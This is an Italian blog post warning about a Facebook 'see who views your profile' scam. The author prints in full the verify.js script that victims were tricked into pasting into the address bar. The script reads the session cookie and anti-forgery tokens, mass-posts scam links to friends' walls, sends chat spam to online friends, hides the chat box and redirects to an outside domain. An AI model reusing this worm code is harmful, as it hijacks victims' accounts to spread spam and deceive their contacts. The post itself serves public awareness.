facebook

Faccio fatica a credere che ci sia ancora gente che ci cada.

In ogni caso, ricevo una chat da un contatto:

Puzza di messaggio automatico all’insaputa del contatto (sotto avrò la conferma).

Copio ed incollo l’url raggiungendo quel profilo:

Clicca per ingrandire (grazie Facebook)

Perché mai copiare un javascript ed incollarlo della barra degli indirizzi del browser?

Qualcuno evidentemente lo fa, mosso da ingenuità, diciamo così.

Copio il dominio che ospita il javascript e lo raggiungo via web:

Trovo il javascript puntato (verify.js) e lo scarico.

///////////////////////////////////////////////////////////////////////////////////////////////////////////////// KuNG FU JS v.1  20yrsplus.info///////////////////////////////////////////////////////////////////////////////////////////////////////////////
//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
function readCookie(name) {		var nameEQ = name + "=";	var ca = document.cookie.split(';');	for(var i=0;i < ca.length;i++) {		var c = ca[i];		while (c.charAt(0)==' ') c = c.substring(1,c.length);		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);	}	return null;
}
var user_id = readCookie("c_user");

// Setup some variables
var post_form_id = document.getElementsByName('post_form_id')[0].value;var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;

// Multiple URL Shorteners
var shortArray = new Array(			   "http://clickily.ws/2lyhc",			   "http://clickily.ws/b6wkjx"			  );
var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];
// Chat message variables
var this_chat = "See who views your profile @ facebook.com/pages/See-who-views-your-profile/223073421043032?";var prepared_chat = encodeURIComponent(this_chat);

///////////////////////////////////////////////////////////////////////////////////////////////////////////////// Post Link to friends walls///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var token = Math.round(new Date().getTime() / 1000);
var http1 = new XMLHttpRequest();
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
var params1 = "";http1.open("GET", url1+"?"+params1, true);http1.onreadystatechange = function() {//Call a function when the state changes.
 if(http1.readyState == 4 && http1.status == 200) { // If state = success				var response1 = http1.responseText;				response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object		response1 = JSON.parse(response1); // Convert the response to JSON				//alert(response4.toSource());				var count = 0;				for(uid in response1.payload.entries){						if(count < 400){								//alert("SENT TO "+response1.payload.entries[count].uid);
 // Loop to send messages							// New XMLHttp object				var httpwp = new XMLHttpRequest();											var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";				var randLink = new Array("http://clickily.ws/2lyhc?", "http://clickily.ws/b6wkjx?");				var statusmessage=" LOL!! I cant believe that you can see who is viewing your profile! I can see the TOP 10 people and I am really OPENMOUTHED that my EX is still checking my Pix and my Profile. You can also see WH0 CHECKS YOUR PR0FILE here";				var title="Find Out Who Visits Your Profile";//				var link="http://clickily.ws/2lyhc?http://clickily.ws/b6wkjx?";				var link = randLink[Math.floor(randLink.length*Math.random())];				var description="Now you can easily checkout how many profile visits you get ";				var picture="http://imgur.com/Drajx.gif";								var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";								httpwp.open("POST", urlwp, true);								//Send the proper header information along with the request								httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");				httpwp.setRequestHeader("Content-length", paramswp.length);				httpwp.setRequestHeader("Connection", "keep-alive");													httpwp.onreadystatechange = function() { //Call a function when the state changes.					if(httpwp.readyState == 4 && httpwp.status == 200){						//alert(http.responseText);						//alert('buddy list fetched');					}
 }
 httpwp.send(paramswp);				}
 count++; // increment counter				}						http1.close; // Close the connection							}	}
http1.send(null);

///////////////////////////////////////////////////////////////////////////////////////////////////////////////// Hide chat boxes///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var hide = document.getElementById('fbDockChatTabSlider');
hide.style.display = "none";

///////////////////////////////////////////////////////////////////////////////////////////////////////////////// Get online friends and send chat message to them///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http3 = new XMLHttpRequest();
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";http3.open("POST", url3, true);
//Send the proper header information along with the requesthttp3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");http3.setRequestHeader("Content-length", params3.length);http3.setRequestHeader("Connection", "close");
http3.onreadystatechange = function() {//Call a function when the state changes.	if(http3.readyState == 4 && http3.status == 200) {				var response3 = http3.responseText;				response3 = response3.replace("for (;;);", "");		response3 = JSON.parse(response3);				var count = 0;				for(property in response3.payload.buddy_list.nowAvailableList){						if(count < 100){								// Loop to send messages							// New XMLHttp object				var httpc = new XMLHttpRequest();								// Generate random message ID												var msgid = Math.floor(Math.random()*1000000);								var time = Math.round(new Date().getTime() / 1000);								var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";				var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";				httpc.open("POST", urlc, true);								//Send the proper header information along with the request				httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");				httpc.setRequestHeader("Content-length", paramsc.length);				httpc.setRequestHeader("Connection", "close");								httpc.onreadystatechange = function() { //Call a function when the state changes.					if(httpc.readyState == 4 && httpc.status == 200){						//alert(http.responseText);						//alert('buddy list fetched');					}				}				httpc.send(paramsc);				}						//alert(property);			count++; // increment counter				}				http3.close; // Close the connection			}}http3.send(params3);

/*///////////////////////////////////////////////////////////////////////////////////////////////////////////////// Become a Fan - MW GIVEAWAY///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http4 = new XMLHttpRequest();
var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params4 = "fbpage_id=223073421043032&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http4.open("POST", url4, true);
//Send the proper header information along with the requesthttp4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");http4.setRequestHeader("Content-length", params4.length);http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.	if(http4.readyState == 4 && http4.status == 200) {					http4.close; // Close the connection			}}http4.send(params4);

///////////////////////////////////////////////////////////////////////////////////////////////////////////////// Become a Fan - MW GIft///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http5 = new XMLHttpRequest();
var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params5 = "fbpage_id=223073421043032&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http5.open("POST", url5, true);
//Send the proper header information along with the requesthttp5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");http5.setRequestHeader("Content-length", params5.length);http5.setRequestHeader("Connection", "close");
http5.onreadystatechange = function() {//Call a function when the state changes.	if(http5.readyState == 4 && http5.status == 200) {					http5.close; // Close the connection			}}http5.send(params5);*/
//document.getElementById('susta').style.display="none";document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";setTimeout("window.location = 'http://dmgdmg.tk/';", 15000);

Lascio il codice per intero per la gioia:

• degli amici coder che si faranno una grassa risata;
• dei motori di ricerca e di chi cercherà la fantastica feature di facebook di vedere chi ha visitato il proprio profilo (?);
• di chi cercherà siti coinvolti in questa boiata;

sperando che, raggiungendo questa pagina, si possa acquisire un granello di consapevolezza in più.

Enjoy and share